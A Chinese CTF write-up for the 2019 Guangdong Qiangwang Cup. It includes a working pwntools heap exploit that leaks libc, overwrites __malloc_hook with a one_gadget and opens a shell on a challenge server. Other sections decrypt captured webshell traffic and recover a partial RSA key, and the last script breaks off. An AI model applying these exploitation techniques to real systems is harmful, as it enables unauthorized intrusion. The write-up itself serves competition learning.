2019广东强网杯_wp

Pwn

pwn1

  • Run函数有个条件竞争,可以泄漏libc,后面libc换了2.27,所以条件竞争配合uaf写fd指针到__malloc_hook然后改为one_gadget即可
2019广东强网杯_wp_第1张图片
from pwn import *
context.log_level = 'debug'  # pwntools: dump every byte sent and received

#p = process('./pwn1')
p = remote('119.61.19.212',8087)  # single global connection shared by every helper below

def sl(x):
    """sendline wrapper: send *x* plus a newline on the global connection ``p``."""
    p.sendline(x)

def ru(x):
    """recvuntil wrapper: consume input from ``p`` up to and including *x*."""
    p.recvuntil(x)

def se(x):
    """send wrapper: write *x* to ``p`` exactly as given (no newline appended)."""
    p.send(x)

def malloc(idx,cont):
    """Menu option 1: wait for the menu prompt, choose 1, then answer the
    index and content prompts on the global connection ``p``.
    ``cont`` is sent with sendline, so a newline follows it."""
    dialogue = (
        ('run\n', '1'),
        ('index:\n', str(idx)),
        ('content:\n', cont),
    )
    for prompt, answer in dialogue:
        ru(prompt)
        sl(answer)

def free(idx):
    """Menu option 2: choose 2 at the menu prompt and answer the index prompt.
    ``idx`` is passed through str(), so int or str both work."""
    dialogue = (
        ('run\n', '2'),
        ('index:\n', str(idx)),
    )
    for prompt, answer in dialogue:
        ru(prompt)
        sl(answer)

def run(idx,cont):
    """Menu option 3: choose 3, answer the index prompt, then send ``cont``
    raw at the key prompt (se(), so no trailing newline is added)."""
    dialogue = (
        ('run\n', '3'),
        ('index:\n', str(idx)),
    )
    for prompt, answer in dialogue:
        ru(prompt)
        sl(answer)
    ru('key:\n')
    se(cont)


# Fill nine slots, then release slots 1..7 (free() calls str() on the
# index, so passing a str here is harmless).
malloc(0,'aaa') #0
malloc(1,'bbb') #1
malloc(2,'ccc') #2
malloc(3,'ddd') #3
malloc(4,'eee') #4
malloc(5,'fff') #5
malloc(6,'666') 
malloc(7,'777')
malloc(8,'888')

for i in range(1,8):
    free(str(i))

# libc leak: run slot 0, free it, then read 6 raw bytes after the next
# menu prompt and zero-extend them to a little-endian 64-bit value.
run(0,'a'*8)
free(0)
ru('run\n')
leak_libc = u64(p.recv(6).ljust(8,'\x00'))
info('leak libc : 0x%x'%leak_libc)
# These offsets are specific to the challenge's libc build (2.27 per the write-up).
libc_base = leak_libc - 96 - 0x3ebc40
info('libc base : 0x%x'%libc_base)
one_gadget = libc_base + 0x4f322
malloc_hook = libc_base + 0x3ebc30


# Same dialogue as malloc(1, '1'), except that the 'run' prompt was already
# consumed by the ru() of the leak above.
sl('1')
ru('index:\n')
sl('1')
ru('content:\n')
sl('1')

for i in range(2):
    malloc('1','1')

# Heap leak: same recipe as above, on slot 1.
run(1,'a')
free(1)

ru('run\n')
leak_heap = u64(p.recv(6).ljust(8,'\x00'))
info('leak heap : 0x%x'%leak_heap)

# Dialogue of malloc(2, '2') with the 'run' prompt already consumed.
sl('1')
ru('index:\n')
sl('2')
ru('content:\n')
sl('2')

info('malloc hook : 0x%x'%malloc_hook)
# The key is sent as the decimal text of malloc_hook XOR the heap leak.
run(2,str(malloc_hook^leak_heap))
free(2)

sleep(2)
malloc(5,'a')
malloc(6,p64(one_gadget))  # content is a packed little-endian 64-bit value

ru('run\n')
sl('1')
ru('index:\n')
sl('0')
#gdb.attach(p)
p.interactive()

Misc

完美的错误

  • 题目描述去除混淆的编码,于是联想到base58,又说错位,所以改一下字符集顺序爆破
# Bitcoin base58 alphabet (no 0, O, I or l). main() rotates it between attempts.
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)  # 58


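def b58encode(v, alphabet=None):
    """Encode the byte string *v* to base58.

    Args:
        v: bytes to encode (``str`` on Python 2, ``bytes`` on Python 3).
        alphabet: the 58-character digit alphabet; defaults to the module-level
            ``__b58chars`` (which ``main`` rotates between attempts).

    Returns:
        The base58 text. Leading NUL bytes become leading ``alphabet[0]``
        characters (Bitcoin's leading-zero compression). An empty input
        encodes to '' instead of raising ValueError from int('', 16).
    """
    if alphabet is None:
        alphabet = __b58chars
    if not v:
        return ''
    base = len(alphabet)

    # bytearray yields integer byte values on both Python 2 and 3, which
    # replaces the Python-2-only v.encode("hex_codec") round trip.
    long_value = 0
    for byte in bytearray(v):
        long_value = (long_value << 8) | byte

    digits = []
    while long_value >= base:
        long_value, mod = divmod(long_value, base)
        digits.append(alphabet[mod])
    digits.append(alphabet[long_value])
    digits.reverse()

    # Each leading 0x00 byte of the input becomes one leading alphabet[0].
    n_pad = len(v) - len(v.lstrip(b'\0'))
    return alphabet[0] * n_pad + ''.join(digits)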


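def b58decode(v, alphabet=None):
    """Decode the base58 text *v* back to a byte string.

    Args:
        v: base58 text.
        alphabet: the 58-character digit alphabet; defaults to the module-level
            ``__b58chars``.

    Returns:
        The decoded bytes as a ``str`` built with ``chr`` (the original
        Python 2 behaviour). Leading ``alphabet[0]`` characters become
        leading NUL bytes.

    Raises:
        ValueError: if *v* contains a character outside *alphabet* (the
            original silently used find()'s -1 and produced garbage).
    """
    if alphabet is None:
        alphabet = __b58chars
    base = len(alphabet)

    # Horner's rule: one multiply-add per digit instead of base ** i per digit.
    long_value = 0
    for c in v:
        long_value = long_value * base + alphabet.index(c)

    out = []
    while long_value >= 256:
        long_value, mod = divmod(long_value, 256)
        out.append(chr(mod))
    out.append(chr(long_value))
    out.reverse()

    # Each leading alphabet[0] character becomes one leading NUL byte.
    n_pad = len(v) - len(v.lstrip(alphabet[0]))
    return chr(0) * n_pad + ''.join(out)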

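def pailie(a):
    """Rotate *a* one position to the left: the first character moves to the end.

    main() applies this repeatedly to try every cyclic shift of the alphabet.
    An empty string is returned unchanged (the original raised IndexError).
    """
    return a[1:] + a[:1]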

if __name__ == "__main__":

    # Try all 58 cyclic shifts of the alphabet, rotating it by one position
    # per pass; after the 58th rotation the original order is restored.
    for _ in range(58):
        __b58chars = pailie(__b58chars)
        print(b58decode("RJv9mjS1bM9MZafGV77uTyDaapNLSk6t358j2Mdf1pbCByjEiVpX"))
2019广东强网杯_wp_第2张图片

撸啊撸

  • 题目是个图片,拿到以后发现文件头多了点东西,猜测是文件修复
2019广东强网杯_wp_第3张图片
  • 谷歌搜了一下__PAGEZERO,发现是Mach-O文件格式,具体可以看https://amywushu.github.io/2017/02/21/基础知识-解读-Mach-O-文件格式.html,于是修复文件头,把0xffffffff改为0xcffaedfe,然后ida打开看,写个异或脚本
2019广东强网杯_wp_第4张图片
2019广东强网杯_wp_第5张图片
a = '938gce1`872db99db`b342d23c0g9g2d'
# Undo the per-character XOR with 1 that the binary applied (see write-up).
flag = ''.join(chr(ord(ch) ^ 1) for ch in a)

print('flag{'+flag+'}')

脑筋急转弯

  • 拿到一个wav文件,猜测是wav隐写,最后用silenteye得到一个压缩包,爆破得到密码654321,然后打开压缩包有个txt
2019广东强网杯_wp_第6张图片
  • 012换成.!?,然后ook,brainfuck解码
2019广东强网杯_wp_第7张图片
2019广东强网杯_wp_第8张图片

抓灰阔

  • 一个流量包,仔细找传输的文件,发现main.jsp,再上网找资料,发现是冰蝎一句话木马,所以目前key和加密的payload有了,逐一解密payload
from Crypto.Cipher import AES
 
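import base64

key = 'ba4ae3277932b0a2'  # AES key recovered from the captured webshell traffic (see write-up)

cipher = AES.new(key, AES.MODE_ECB)  # one cipher object; the duplicate `decipher` was dropped

# The captured payload is base64 text; base64.b64decode replaces the
# Python-2-only str.decode('base64').
with open('./data/flag.enc','rb') as f:
    msg = base64.b64decode(f.read())

# Decrypt once and reuse the plaintext for both the console dump and the
# output file; the with-block closes the handle the original left open.
b = cipher.decrypt(msg)
print(b)
with open('./data/flag_dec.class','wb+') as f:
    f.write(b)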
  • 本来想逐一反编译class为java文件,突然发现参数是写在class文件中的,然后找到一个串加密的payload中有上传一个flag文件
2019广东强网杯_wp_第9张图片
  • 于是把content的内容拿去base64解码后写入文件中,发现是elf文件,但是格式不对,根据https://blog.csdn.net/xuehuafeiwu123/article/details/72963229把第五字节到七字节修正,然后elf打开
2019广东强网杯_wp_第10张图片
2019广东强网杯_wp_第11张图片

写脚本解密

2019广东强网杯_wp_第12张图片

Crypto

强大的hash

  • 给了个hash,需要我们写脚本爆破,这里有个坑点是hash的类型是$argon2d,PHP不支持这种类型
from argon2 import PasswordHasher


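# Numeric fragments to try; the flag is assumed to have the shape
# CTF_<x>_<y> with x and y drawn from this set. (Renamed from `list`, which
# shadowed the builtin.)
candidates = ["114","119","110","120","121","122","170","189","180","133","144","911"]

ph = PasswordHasher()
# Target hash from the challenge. It is argon2d, which PHP does not handle,
# hence the Python argon2 package. (Renamed from `hash`, a builtin name.)
target_hash = "$argon2d$v=19$m=32768,t=100,p=1$MTIzNDU2Nzg$iuSRO5tkWxBxqgkI5g9O5ZersA//xvgvrKxH8QuxBBI4yKbG4aRFqITP/Rh5giFRuL9PTJP+/0BUfNwZHzx9bQ"
for i in candidates:
    for j in candidates:
        char = 'CTF_' + i + '_' + j
        print char
        try:
            if ph.verify(target_hash, char):
                print 'done : ',char
                exit(0)
        except Exception:
            # verify() raises on a mismatch, so an exception is the normal
            # outcome for a wrong guess. NOTE(review): this also hides hash
            # parsing/parameter errors that would make every guess "fail".
            continue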
2019广东强网杯_wp_第13张图片

遗失的秘密

  • 见到过类似的题目https://www.40huo.cn/blog/rsa-private-key-recovery-and-oaep.html,先把n补全,然后改一改脚本的值,就能跑出flag
2019广东强网杯_wp_第14张图片
#!/usr/bin/python
#-*- coding:utf-8 -*-

import re
import pickle
from itertools import product
from libnum import invmod, gcd


def solve_linear(a, b, mod):
    """Solve a*x = b (mod ``mod``) for x, where ``mod`` is a power of two.

    Returns None when ``a`` or ``b`` is even (an even ``a`` has no inverse
    modulo a power of two). Otherwise returns b * a^-1 reduced with
    ``& (mod - 1)``, the power-of-two shortcut for ``% mod``.
    """
    a_odd = bool(a & 1)
    b_odd = bool(b & 1)
    if not (a_odd and b_odd):
        return None
    inverse = invmod(a, mod)
    return (b * inverse) & (mod - 1)


def to_n(s):
    """Parse an OpenSSL-style hex dump ("00:c4:9d:...") into an int.

    Every character that is not a lowercase hex digit is dropped first, so
    colons, spaces and newlines are ignored (uppercase digits are dropped
    too, matching the original [^0-9a-f] character class).
    """
    hex_digits = "0123456789abcdef"
    compact = "".join(ch for ch in s if ch in hex_digits)
    return int(compact, 16)


def msk(s):
    """Turn a dump with blank cells into (nibble ranges, known mask, known value).

    Each colon-separated cell contributes its last two characters, so a
    blank cell ("  ") becomes two spaces that the helpers treat as unknown
    nibbles. Returns the per-nibble candidate lists from msk_ranges(), the
    known-nibble mask from msk_mask() and the known-nibble value from
    msk_val(), in that order.
    """
    cells = [cell[-2:] for cell in s.split(":")]
    cleaned = "".join(cells)
    ranges = msk_ranges(cleaned)
    mask = msk_mask(cleaned)
    value = msk_val(cleaned)
    return ranges, mask, value


def msk_ranges(s):
    """Map each nibble character to its candidates: all sixteen values for a
    blank (" "), otherwise the single known hex digit."""
    candidates = []
    for ch in s:
        if ch == " ":
            candidates.append(range(16))
        else:
            candidates.append([int(ch, 16)])
    return candidates


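def msk_mask(s):
    """Bitmask with 0xf for every known nibble of *s* and 0x0 for every blank.

    Built by shifting one nibble at a time, so an empty string yields 0
    instead of raising ValueError from int("", 16).
    """
    mask = 0
    for ch in s:
        mask = (mask << 4) | (0x0 if ch == " " else 0xf)
    return mask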


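def msk_val(s):
    """Integer whose known nibbles are the hex digits of *s* and whose blank
    nibbles are 0.

    Built by shifting one nibble at a time, so an empty string yields 0
    instead of raising ValueError from int("", 16).
    """
    value = 0
    for ch in s:
        value = (value << 4) | (0 if ch == " " else int(ch, 16))
    return value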


E = 65537  # RSA public exponent

# Public modulus as an OpenSSL-style hex dump. Its final byte is missing;
# the main loop below appends each candidate byte before calling to_n().
N_ = """00:c4:9d:36:a4:77:76:12:12:85:24:6c:74:1d:7d:
    b3:ce:f4:c3:a4:69:cd:0b:2e:8f:d6:75:e3:80:b8:
    e8:1c:ce:e8:60:90:45:56:73:ab:32:32:00:7f:6a:
    76:3e:b6:10:d3:a2:74:da:f9:4e:a5:7e:ae:ef:f4:
    da:82:57:6d:68:82:50:d8:b1:fc:92:b1:5c:7d:54:
    f5:7e:d0:06:8a:60:ff:82:70:72:20:68:4b:71:ba:
    87:44:57:c1:97:a0:8a:2d:53:93:f3:0a:60:87:a3:
    85:c8:45:e6:0a:88:85:b5:ff:c7:09:9a:76:03:fe:
    99:b6:fb:8a:1e:9f:a8:42:3a:0a:c9:a9:bf:1c:87:
    2c:c4:99:10:db:46:e3:a9:a5:79:93:8c:75:71:ec:
    c6:3b:af:44:dc:60:c4:53:f6:3c:e8:73:2f:50:10:
    38:e7:6f:d0:a5:4b:ae:e3:1e:43:11:42:2c:a2:38:
    e6:3f:0b:13:54:63:e8:2f:9e:61:ab:08:65:97:e0:
    27:30:19:fd:a7:fe:5c:d8:11:b8:34:87:ad:02:c2:
    bc:cd:73:d3:86:be:fd:2a:b4:fe:7d:7e:d3:64:bb:
    6f:63:ed:a6:1d:ee:f2:80:da:9d:7a:23:7f:c1:39:
    b0:98:0c:85:8f:d0:4b:9f:e4:1a:26:fc:44:d1:67:
    03:32:03:0c:91:61:23:4c:81:6f:42:18:88:41:dc:
    27:55:a3:07:7c:a1:ad:f3:58:4d:91:07:65:f1:63:
    f2:34:d5:17:0e:59:c6:bb:b6:6d:7d:0c:d2:64:4b:
    b9:9c:52:59:03:8e:2a:43:23:76:33:c3:e8:72:3b:
    1c:e0:40:97:36:5f:ae:00:d7:e3:09:eb:df:55:44:
    22:b4:09:00:b5:09:41:70:6c:5c:3b:98:d3:34:7e:
    60:a2:b8:93:bd:af:32:77:48:48:8a:a5:9c:0e:6a:
    a1:79:36:86:8c:e9:3f:b1:a2:a7:4a:3a:d8:d6:f6:
    dd:62:d8:ae:9e:13:bb:0c:6b:b1:65:68:0d:7e:58:
    3f:68:1e:91:49:13:19:68:2b:fd:3c:5e:52:fa:76:
    b0:57:fc:0e:35:d8:71:56:41:06:ef:50:99:56:dd:
    d4:9a:1f:d3:46:26:12:9c:15:4b:43:fc:1b:de:c9:
    06:ad:82:56:63:c8:a4:83:32:d2:35:05:23:15:52:
    d9:0a:73:85:5e:c9:c2:56:af:69:d2:5f:77:04:28:
    c8:4c:b9:a6:d4:15:15:b5:15:99:13:ef:a9:a5:de:
    5a:74:b1:03:cf:32:a5:03:69:f8:e9:bb:7e:16:31:
    5e:43:e7:02:51:ac:c5:f6:bf:ef:1c:74:f7:13:0c:
    19:ad:"""





# Partial private-key components from the damaged key, in the same dump
# format. A blank cell ("  ") is an unknown byte; msk() returns per-nibble
# candidate lists, a mask of the known nibbles and their values.
# search() extends p nibble by nibble from p_ranges.
p_ranges, pmask_msk, pmask_val = msk("""00:  :05:89:  :bd:35:  :  :23:  :  :  :  :84:
      :  :ed:  :70:14:  :  :  :10:  :  :87:  :51:
    ea:  :97:69:  :52:  :  :  :  :  :ea:  :  :15:
      :  :34:  :be:11:23:  :  :34:14:  :94:  :10:
      :  :74:87:37:ee:81:62:ee:95:  :  :dc:49:dd:
      :  :35:  :81:  :fa:  :  :  :86:  :  :  :fb:
      :93:  :  :12:  :14:  :ab:76:  :96:  :  :27:
      :21:  :04:01:41:  :98:  :ff:  :  :12:dc:  :
    cd:  :39:95:30:  :47:  :fa:ff:  :34:  :ad:  :
      :52:02:fa:bc:14:22:22:48:61:62:bd:53:  :  :
    72:08:cb:41:88:  :  :  :63:91:30:fe:  :  :42:
    87:  :18:52:  :39:dd:  :68:  :fe:06:88:81:  :
      :  :  :ae:fd:  :  :fb:21:37:59:  :53:  :fa:
      :07:40:eb:33:77:51:64:10:dd:  :73:  :86:62:
      :bf:  :79:  :34:  :bb:  :44:ff:  :46:fe:90:
    ef:  :52:ad:  :  :fe:  :69:18:89:bd:cd:09:46:
      :  :74:71:  :  :  :41:66:  :  :11:  :25:  :
    39:8b""")

# q: search() derives q from p and N, so only qmask_msk/qmask_val are used
# as a filter; q_ranges is not referenced in the visible script.
q_ranges, qmask_msk, qmask_val = msk("""00:ce:43:ef:  :76:58:17:43:31:  :  :32:70:  :
    89:  :  :36:55:06:  :79:66:78:  :  :  :  :  :
      :85:  :  :  :  :  :33:bb:  :  :56:  :66:cb:
      :08:  :  :90:cb:  :  :24:fa:ca:47:  :  :  :
      :88:  :83:01:  :62:  :  :  :  :  :  :ad:ae:
      :  :  :58:  :ec:  :  :  :09:04:86:  :05:00:
      :df:50:84:81:80:  :ae:  :24:  :94:da:  :04:
    ce:  :ef:  :  :ed:be:bf:43:78:  :  :05:93:  :
    08:52:05:  :  :  :  :ae:  :  :  :  :ab:  :  :
      :76:ce:  :  :  :  :19:bd:22:  :ef:dc:bf:ea:
    ab:78:01:  :  :85:  :  :  :ea:  :  :fb:  :  :
    92:66:19:  :  :ab:  :  :82:  :  :31:  :  :da:
    82:  :13:82:43:  :  :94:13:41:  :  :  :37:  :
      :04:56:02:87:dd:  :58:27:  :  :24:  :  :  :
    28:  :  :09:14:89:  :  :  :49:59:  :16:eb:65:
      :01:22:  :  :dd:  :78:  :  :db:90:  :ac:  :
      :fd:  :03:74:  :  :  :  :92:  :00:ba:  :  :
      :05""")

# d, dp and dq: only the known-nibble mask/value pairs are consulted by
# search(); the candidate lists are discarded.
_, dmask_msk, dmask_val = msk("""11:  :  :69:62:64:  :  :  :  :15:  :13:de:de:
    cf:  :  :17:  :  :75:  :98:42:fc:  :12:15:08:
      :  :  :  :  :36:  :be:25:48:  :  :19:  :  :
      :47:11:19:  :03:  :49:fc:da:  :96:45:eb:  :
      :  :  :91:  :ea:  :  :55:ff:  :37:58:  :  :
    19:  :  :73:40:  :91:15:01:da:91:22:fd:32:  :
      :  :50:  :  :66:  :  :  :42:  :  :ef:  :  :
    df:42:  :97:30:  :39:  :  :  :  :  :  :dc:  :
      :  :  :  :  :38:  :  :  :88:28:  :05:  :  :
    78:59:fa:  :86:  :19:24:  :  :  :  :da:cf:15:
    39:  :  :  :  :ef:55:  :ce:47:  :58:89:  :fb:
      :24:  :  :  :92:  :  :ee:  :  :db:67:31:ce:
      :28:  :72:ec:89:  :04:  :  :50:  :  :  :  :
      :37:  :44:  :  :  :  :56:  :38:  :bb:47:bb:
    66:83:99:22:07:72:  :  :48:52:02:  :  :  :29:
      :82:56:  :67:  :95:  :  :56:94:  :  :71:  :
    bf:27:98:  :  :54:98:26:06:87:  :ae:  :53:be:
      :  :80:37:60:61:ea:ef:de:  :  :df:90:81:  :
    70:  :06:33:26:  :75:fe:95:  :92:  :78:cd:05:
    64:cc:68:  :  :36:54:  :bd:16:90:ee:60:  :  :
      :  :41:  :  :91:  :79:58:06:50:  :46:  :  :
    45:  :09:ca:ac:16:  :27:98:  :  :ba:82:  :77:
    93:98:ad:  :15:  :67:53:97:ad:ee:50:44:  :31:
    07:  :ff:01:  :09:  :  :  :  :  :46:  :  :42:
    15:  :db:df:42:be:  :  :  :78:  :41:  :  :  :
      :14:  :  :25:fc:  :84:  :  :  :  :  :  :20:
    da:46:01:eb:87:  :12:57:  :  :56:af:  :87:93:
    60:  :02:  :18:89:63:72:ad:  :ed:cf:  :  :84:
      :22:  :13:  :  :dd:  :ff:  :  :  :de:62:37:
      :19:66:  :  :86:02:  :38:  :  :  :  :ec:14:
    12:  :43:93:19:65:98:  :  :03:  :  :  :ef:  :
      :  :ca:07:92:22:  :  :bb:15:eb:  :  :  :35:
      :72:29:cd:  :  :99:  :  :  :  :41:06:  :  :
      :43:33:  :32:  :  :54:be:92:62:  :78:59:42:
    79:89""")

# Note the single-space first cell: it contributes one unknown nibble, not two.
_, dpmask_msk, dpmask_val = msk(""" :39:  :28:16:02:89:ce:11:fe:  :  :  :  :af:
      :  :  :ed:97:  :  :11:20:ba:ae:98:ad:  :  :
      :10:87:ac:07:  :  :  :  :50:  :  :70:50:52:
    df:89:eb:02:  :  :  :  :93:11:  :  :12:  :56:
      :08:  :  :ea:  :10:fa:19:  :  :  :54:45:07:
      :  :bc:ff:33:  :db:63:49:fe:52:  :33:  :  :
    bf:cd:45:91:  :10:  :  :92:81:40:03:  :80:  :
    29:  :30:  :ed:43:64:ca:  :bf:64:  :  :bf:  :
      :  :  :24:72:84:  :  :ff:  :  :24:  :81:27:
    db:23:  :64:  :67:  :ba:  :  :bc:  :  :  :  :
      :ae:88:  :  :  :  :  :91:  :  :14:  :ba:ef:
      :89:  :  :  :  :  :  :  :  :05:  :75:52:  :
      :  :  :be:ad:df:  :02:88:00:  :  :15:45:  :
    cf:32:  :ca:  :93:  :32:  :40:  :27:dd:  :19:
    73:dc:  :  :  :  :  :cf:  :  :dd:  :  :ca:  :
    ee:  :ca:  :  :  :49:  :27:  :58:53:  :64:25:
      :22:06:16:ff:62:bc:  :  :  :  :24:fc:  :  :
    df""")

_, dqmask_msk, dqmask_val = msk("""02:  :bd:  :19:25:98:75:  :65:  :55:28:33:bc:
    34:84:91:01:96:  :  :08:  :32:45:  :27:  :  :
      :fe:  :bb:63:32:68:  :51:bd:75:40:  :52:52:
      :  :  :78:85:fc:94:  :07:  :14:  :  :  :  :
    15:dd:  :  :93:  :01:  :  :77:ca:  :40:  :da:
      :89:bc:87:62:dc:ac:61:88:  :  :70:  :69:  :
      :36:  :  :21:08:  :dc:73:  :ad:da:ee:fe:  :
    96:  :58:  :  :46:  :29:ff:97:ce:  :  :  :cb:
    51:  :  :81:  :22:  :  :19:  :10:69:41:36:ca:
      :22:49:  :cc:cf:06:  :  :08:  :76:  :  :45:
    98:  :  :45:  :  :  :69:13:65:  :  :da:54:  :
    19:  :ee:24:  :73:  :  :  :  :  :  :18:53:40:
    21:25:  :  :84:52:cd:  :49:33:78:  :  :ed:  :
    25:27:  :  :  :ca:  :  :  :ca:  :  :bc:  :02:
    31:70:  :10:ca:84:59:  :  :  :52:  :27:76:  :
    47:  :66:bf:ff:  :03:  :99:ff:  :df:  :  :  :
      :46:27:45:  :65:07:  :48:da:dc:  :80:  :  :
    f9""")


def search(K, Kp, Kq, check_level, break_step):
    """Rebuild p (and q) one low-order nibble at a time from the partial dumps.

    At step ``s`` every candidate for the low ``s`` nibbles of p is extended
    by each allowed value of the next nibble (from ``p_ranges``) and kept
    only if it stays consistent with the known nibbles of the other key
    components.

    Args:
        K: multiplier in e*d = 1 + K*(N - p - q + 1); used at check_level >= 2.
        Kp: multiplier in e*dp = 1 + Kp*(p - 1); used at check_level >= 3.
        Kq: multiplier in e*dq = 1 + Kq*(q - 1); used at check_level >= 4.
        check_level: how many consistency filters to apply (1: q, 2: also d,
            3: also dp, 4: also dq). Levels 2 and 4 reuse ``qval`` from
            level 1, so check_level 0 is not meaningful.
        break_step: number of nibbles to reconstruct before returning True.

    Returns:
        False as soon as a step leaves no candidate, True when ``break_step``
        steps complete with candidates left. At check_level 4 a pair with
        pval * qval == N prints the recovered key and calls quit() instead
        of returning.

    Reads the module globals N, E, p_ranges and the *mask_msk/*mask_val tables.
    """
    max_step = 0
    cands = [0]
    for step in range(1, break_step + 1):
        #print " ", step, "( max =", max_step, ")"
        max_step = max(step, max_step)  # only consumed by the commented-out progress print

        mod = 1 << (4 * step)  # work modulo 2^(4*step): the low `step` nibbles
        mask = mod - 1

        cands_next = []
        # p_ranges is indexed from the most significant nibble, so the nibble
        # `step` positions from the low end is p_ranges[-step].
        for p, new_digit in product(cands, p_ranges[-step]):
            pval = (new_digit << ((step - 1) * 4)) | p  # place the new nibble above the known ones

            if check_level >= 1:
                # q = N * p^-1 (mod 2^(4*step)); None when pval or N is even
                qval = solve_linear(pval, N & mask, mod)
                if qval is None or not check_val(qval, mask, qmask_msk, qmask_val):
                    continue

            if check_level >= 2:
                # low nibbles of d from e*d = 1 + K*phi, with phi = N - p - q + 1
                val = solve_linear(E, 1 + K * (N - pval - qval + 1), mod)
                if val is None or not check_val(val, mask, dmask_msk, dmask_val):
                    continue

            if check_level >= 3:
                # low nibbles of dp from e*dp = 1 + Kp*(p - 1)
                val = solve_linear(E, 1 + Kp * (pval - 1), mod)
                if val is None or not check_val(val, mask, dpmask_msk, dpmask_val):
                    continue

            if check_level >= 4:
                # low nibbles of dq from e*dq = 1 + Kq*(q - 1)
                val = solve_linear(E, 1 + Kq * (qval - 1), mod)
                if val is None or not check_val(val, mask, dqmask_msk, dqmask_val):
                    continue

                # Full factorisation found: rebuild the private key and stop.
                if pval * qval == N:
                    print "Kq =", Kq
                    print "pwned"
                    print "p =", pval
                    print "q =", qval
                    p = pval
                    q = qval
                    d = invmod(E, (p - 1) * (q - 1))
                    coef = invmod(p, q)

                    from Crypto.PublicKey import RSA  # local import: only needed on success
                    print RSA.construct(map(long, (N, E, d, p, q, coef))).exportKey()
                    quit()

            cands_next.append(pval)

        if not cands_next:
            return False
        cands = cands_next
    return True



def check_val(val, mask, mask_msk, mask_val):
    """True if the known nibbles of ``val`` match the dump.

    ``mask_msk`` selects the known nibbles and ``mask_val`` holds their
    values; both are first restricted to ``mask`` (the nibbles reconstructed
    so far) so only that part of ``val`` is compared.
    """
    known_bits = mask & mask_msk
    expected = mask & mask_val
    observed = val & known_bits
    return observed == expected


# K = 4695
# Kp = 15700
# Kq = 5155

# Outer brute force over the missing last byte of N. Note that range(0xff)
# stops at 0xfe, so the byte value 0xff is never tried.
for i in range(0xff):
    N = N_ + hex(i)[2:].rjust(2,'0')  # append the candidate byte as two hex digits

    N = to_n(N)
    print "index : ",i

    # Stage 1: find K using the q and d filters. If no K passes, the loop
    # ends with K == E - 1 and the later stages silently continue with it.
    for K in range(1, E):
        # if K % 100 == 0:
        #     print "checking", K
        if search(K, 0, 0, check_level=2, break_step=20):
            print "K =", K
            break

    # Stage 2: with K fixed, find Kp using the dp filter as well.
    for Kp in range(1, E):
        # if Kp % 1000 == 0:
        #     print "checking", Kp
        if search(K, Kp, 0, check_level=3, break_step=30):
            print "Kp =", Kp
            break

    # Stage 3: with K and Kp fixed, find Kq. A full factorisation makes
    # search() print the key and quit(); otherwise the next N byte is tried.
    for Kq in range(1, E):
        # if Kq % 100 == 0:
        #     print "checking", Kq
        if search(K, Kp, Kq, check_level=4, break_step=9999):
            print "Kq =", Kq
            break
#!/usr/bin/python
# coding=utf-8
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
import gmpy2

# Prime factors recovered by the key-reconstruction script above.
p = 30804877236372761296348297513767908130120426767441642194038947059431749919743933282721728129660558520306627781991434638545287122418576024822599938752655436891429241798416041881441469038271460545196755187872022209260074336340748692939443634393492611052850561312058115000234467417922716845989845380178291512893577636848676778152648705150749219629638913963012345388388992649857974643758097581431795569765569985118215469798809551704275008726932734117893757436777110974529289423114881289423038562352073193732977840168067817149865622380253870276206212656648830136975036452877460473463818007722056777837507566352911184181643
q = 26038591288856688238001759665609016744197175469090080494077820415283745172609947555684568450035539489682168553390403854805974969118763740560638548072896648612347287461822059996717273680094814363090434263883250281614203478279438635312321752371517752177819983938115532573238089291708699056464231184039223531822571471611431921747169774540943776543504663419138030516108434288911593973010680364553026970545232818747951718950151516127319881685156986937644295056292836729469548074713781625918117631575942194589642230959265894967721587381648790905383499092379075578245308113268969812469233669312409066969648987454629639842309

N = p*q
e = 65537

#print N
#print e
phin = (p-1)*(q-1)
d = gmpy2.invert(e, phin)  # private exponent d = e^-1 mod phi(N)
# with open('private.pem', 'r') as f:
#     private = RSA.importKey(f)
#     oaep = PKCS1_OAEP.new(private)

# Read the whole ciphertext as one big-endian integer (Python-2 str.encode('hex')).
with open('flag.txt.en', 'rb') as f:
    data_enc = int(f.read().encode('hex'),16)
# Raw RSA: a plain modular exponentiation. PKCS1_OAEP is imported above but
# not applied here, so any OAEP padding would appear in the printed output.
plain = gmpy2.powmod(data_enc, d, N)
plain = hex(plain)[2:]
if len(plain) % 2 != 0:  # hex() drops a leading zero nibble; restore even length for decode('hex')
    plain = '0' + plain
print plain.decode('hex')
2019广东强网杯_wp_第15张图片

美好的回忆

利用第二段 爆破key,然后解密

#coding:utf-8

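raw ="ood time"  # known plaintext of the second 8-byte block (from the write-up)

two = [0xCD, 0xD9, 0x3B, 0x0A, 0xCF, 0xAA, 0x2A, 0x1E]  # one known 8-byte vector of that block

iv = [0x55, 0xE5, 0x9E, 0x0E, 0x27, 0x8A, 0x34, 0x63]  # the other vector XORed with it

# With both vectors and the plaintext known, each key byte is the XOR of the
# three. The original's 256-way search per byte always found exactly this
# value (XOR has a unique solution), so it is computed directly.

key = [ord(ch) for ch in raw]

t_key = [c ^ v ^ k for c, v, k in zip(two, iv, key)]

print(t_key)

# Decrypt the remaining blocks: plaintext = previous block ^ key ^ ciphertext.
# The file is opened in binary mode and closed by the with-block (the original
# left it open); bytearray gives integer bytes on both Python 2 and 3.
flag = ''
with open('flag.txt.encrypted', 'rb') as f:
    raw_iv = bytearray(f.read(8))
    for _ in range(7):
        enc = bytearray(f.read(8))
        flag += ''.join(chr(a ^ k ^ b) for a, k, b in zip(raw_iv, t_key, enc))
        raw_iv = enc

print(flag)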

悲伤的结局

  • 爆破 最后的padding 其他和上一题一样
#coding:utf-8


# print 19 ^ 24 ^ 1
# exit()



raw ="keep away from xiaocui!"  # known plaintext; an 8-byte window of it is tried at each of 8 offsets below

# raw = "have a good time.flag{21cb8c804abb60be5c9befcc928ccf5b}"


BLOCK_SIZE =8  # cipher block length in bytes

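def pad(data, block_size=None):
    """Append ``n`` bytes of value ``n`` so the length is a multiple of the block size.

    Args:
        data: the byte string to pad.
        block_size: block length in bytes; defaults to the module-level
            BLOCK_SIZE when not given.

    Returns:
        ``data`` extended by 1..block_size padding bytes; an already aligned
        input (including an empty one) receives a full block of padding.
    """
    if block_size is None:
        block_size = BLOCK_SIZE
    padding_len = block_size - len(data) % block_size
    return data + (chr(padding_len) * padding_len).encode()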

#存在8种可能性

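# The original reassigned iv/two several times inside the loop and kept a
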